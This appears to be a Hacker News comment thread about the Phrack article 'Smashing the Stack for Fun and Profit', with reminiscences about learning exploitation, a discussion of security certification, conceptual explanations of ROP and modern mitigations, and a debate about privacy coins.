I think one big change these days is just that more people will self-publish their writeups and research. There are also a lot more security conferences that people present at some with a more narrow focus than the well known conferences too leading to more specialty content.
I do a weekly podcast[0] talking just about the latest exploits and strategies/research from the last week and pulling content for that is basically just following a ton of RSS feeds. There is a lot more getting written these days compared with the years when Phrack was regularly released. Unfortunately its also more spread out and harder to find.
This article, and then working through the book "Hacking and the Art of Exploitation" taught me the true fundamentals of the C programming language, and Linux. The other key ingredient was working through the classic "digital evolution" wargames where you'd SSH into a box as level1 and work your way up from there.
In 2017 I got a second hand Cisco ASA just to play with the shadowbrokers tools. EXTRABACON was the codename for the SNMP exploit using a buffer overflow.
This was an interesting excercise because there were NO logs of this happening on the Cisco ASA, not even when ramping every loglevel to debug. Well only on the console port. Exception in readline() or something like it. Doing stuff for security monitoring in daily life this ehm was alarming, but not unexpected. Fixing “No logs” is often a challenge for blue teams.
Anyway it was alarming enough to find and read through the Common Criteria EAL4+ certification docs for the Cisco ASA only to find that SNMP was excluded from certification scope. I still have the idea in the back of my head to explore scope exclusions in other certification docs for other unfortunate exclusions.
Also the lack of mitigations like stack canaries, ASLR or others was quite surprising for a certified black box security device on the network perimeter.
CCTL testing of commercial products at basically any level is a joke; you can just look at the list of certified commercial products and the subsequent vulnerability feeds for them. I'm unaware of anyone in the field that takes them seriously.
The assumptions about environment and the system-under-test has been the Achilles' heel in any certification I've been part of.
It isn't like the CC folks aren't aware of the problem. The idea was that the Security Target (definition of the system) could declare conformance to a standardized Protection Profile which consumers could use as a shortcut to understanding what was promised.
However, nobody looks at STs nor PPs except the vendor and the certifier, so all that work is for naught. You could absolutely get a CC cert with the environment that it is unplugged from a network.
Just like almost every FIPS 140 validated crypto module has a "FIPS mode" that is what was validated but is never actually used in production, even by government customers.
Beyond getting slower updates, etc, FIPS mode has the unintentional side effect of being the "look at me I have interesting stuff" flag for potential attackers. It is usually quite easy to determine remotely that a networked device is in FIPS mode, too (due to allowed crypto protocols, etc).
A classic, but these days if you want to reproduce those bugs you need to build your code with -fno-stack-protector, enable executable stack, disable ASLR in the kernel, etc.
These days these things are less useful, but recreating known-exploits is still educational. Once you get buffer-overflows handled you can look for more exotic things, format-string attacks, and similar.
Without going too far side-tracked: I think the Arch wiki has demonstrated that a community wiki can be very useful - I do hope people continue to contribute to the Debian wiki (although I find myself mostly on Ubuntu of late).
Anyway, there's a certain path from phrack through debian-administration.org that maps out where I find myself today, so happy coincidence to see the two line up in the threads.
I moved from Edinburgh, Scotland, to Helsinki about five years ago. (I'm actually going to complete my post-Brexit registration to retain permanent residency this afternoon!)
The arch wiki has been very useful to me over the past few years, I guess the barrier to entry there is lower for contributors. On my site I had a fair number of people writing interesting blog-posts, and comments, but only very very rarely did anybody submit an article.
I felt like I had a good niche audience, but sadly never quite enough people to keep me really motivated. I'm just glad I managed to setup the redirects to the wayback machine - I feel like if the site disappeared for good I'd have lost a chunk of my life!
Not really. If you can overwrite the return address, and you have some time to plan out your payload in advance, you can write a program by “returning” into other bits of the program or its libraries.
Return Oriented Programming (ROP) can bypass the non-executable stack protection, since existing "gadgets" from program memory are executed rather than attacker-provided shellcode.
However the stack protection will probably require a separate information leak (to find the canary value) or arbitrary write (to overwrite it) to bypass. Unless the attacker is fortunate to find an unprotected function which the compiler missed, or a value that can be overwritten which changes the control flow and isn't protected by the canary.
ASLR is also a decent mitigation against ROP, and requires an information leak so the exploit code can calculate the memory offset to find the library gadgets.
In short, ROP isn't the solution to all the mitigations the parent posted; in fact ASLR is designed to make ROP harder to exploit.
If you're exploit using existing code (which would be limited), but if you want to inject code you typically need to put on the stack. Maybe one could inject code into the .bss/.data section, but this is probably protected from execution as well. The .text section is probably read only.
Think I actually looked at this and an (at the time) recent 0day for opensshd that was found and written up by a couple of Finnish students - as a motivational presentation for PaX and/or grsecurity while at university.
Fully automating ROP is difficult, but people have written many scripts to find interesting "gadgets" that set various registers and also found useful "targets" to ROP to, such as a handful of instructions inside of most libc's system command that can yield a shell if jumped to with light constraints.
I'm trying to remember where, but I once saw this article presented with a very nice guide to replicating the exploits in a VM on a modern computer.
I think it must have been in university, unfortunately when I look up the course number, the resources seem to be (understandably, I suppose) date gated.
It's a bit disappointing to still see overflows around, but at least blindly smashing the stack is no longer usually exploitable for modern systems with basic security.
I seem to recall there being some efforts to standardize "fixes" for C, and they never got adopted by anybody important, so the C development community kind of just failed hardcore to prevent it. IMHO it was never about the tools, it was about how we used them and the interfaces for common conventions.
Actually, I take that back: it is also the tools' fault. GCC should just refuse to compile any reference to strcpy().
It describes new kinds of metadata leakage attacks that can be launched against privacy coins, by adversaries with large budgets, such as professional criminal organizations, blockchain analysis companies and nation states. The privacy coin HUSH has developed this defensive technology and was first to implement it in September 2019.
There is a YouTube video where the author explains why he named the paper this way, this link has the timestamp where it's talked about: https://youtu.be/berM7Dnnoz4?t=405
"This is a whole new research field I am creating, that is why I called it Attacking Zcash Protocol For Fun And Profit, just like Smashing The Stack for Fun And Profit, it created a whole new field"
Also, for the hardcore HN nerds: The paper focuses on Zcash Protocol, but the ideas apply to any cryptocoin with a transaction graph, so Monero is definitely vulnerable. Much more vulnerable that Zcash Protocol.
There are very few unique source codebases which implement privacy coins, maybe a half dozen depending on how lenient you are (i.e. is DASH a privacy coin? Barely, but it could be considered one. Blockchain analysis companies make fun of the "privacy" of DASH.)
I believe when he says "inventing a whole new field" he means inventing a whole new field of attacks and defenses, just like the Phrack paper invented a whole new industry of attacks and then their defenses.
Taking these new kinds of attacks into account, all existing privacy coins are vulnerable. Monero is more vulnerable than Zcash Protocol, since it does not have Zero Knowledge Math. It uses Group Theory, which leaks metadata like crazy.
So why would one pick Hush over other coins like Zcash? Because of less metadata leakage?
What I am trying to get at is, what value does Hush have in the real world? It's a privacy coin cool, but how can it be adopted/used by institutions etc. And if the tech is so great why is no one using it right now?
Should propably be required reading for every programmer and especially for those that work with memory unsafe languages. With a side of modern mitigation techniques.[0]
A simple compare and contrast between C and zig/rust/D might be interesting - or even golang for that matter (the idea being that code could be reasonably similar, and yet somewhat idiomatic - and illustrate how the C code is exploitable, but the safe language version isn't - except when made to be).
Reading this article back in the day is how I learned how stack smashing works! I also remember when the EFF stopped hosting Phrack because most of their bandwidth was people downloading every issue off the EFF’s web server.
Correction: it was hosted on an anonymous FTP server, not a web server. Also, I was one of those people who downloaded every issue, probably with ncftp.
> The Smash the Stack Wargaming Network hosts several Wargames. A Wargame in our context can be described as an ethical hacking environment that supports the simulation of real world software vulnerability theories or concepts and allows for the legal execution of exploitation techniques. Software can be an Operating System, network protocol, or any userland application.
Since then, I've talked to some people I trust who say they were exploiting overflows prior to 1995 (by like a year or so), so it was in the air before then, but I haven't seen much evidence that anything like a full-fledged stack overflow had been exploited in the 5 years between '88 and '95.
Here's a few I'm aware of:
https://www.alchemistowl.org/pocorgtfo/
https://secret.club/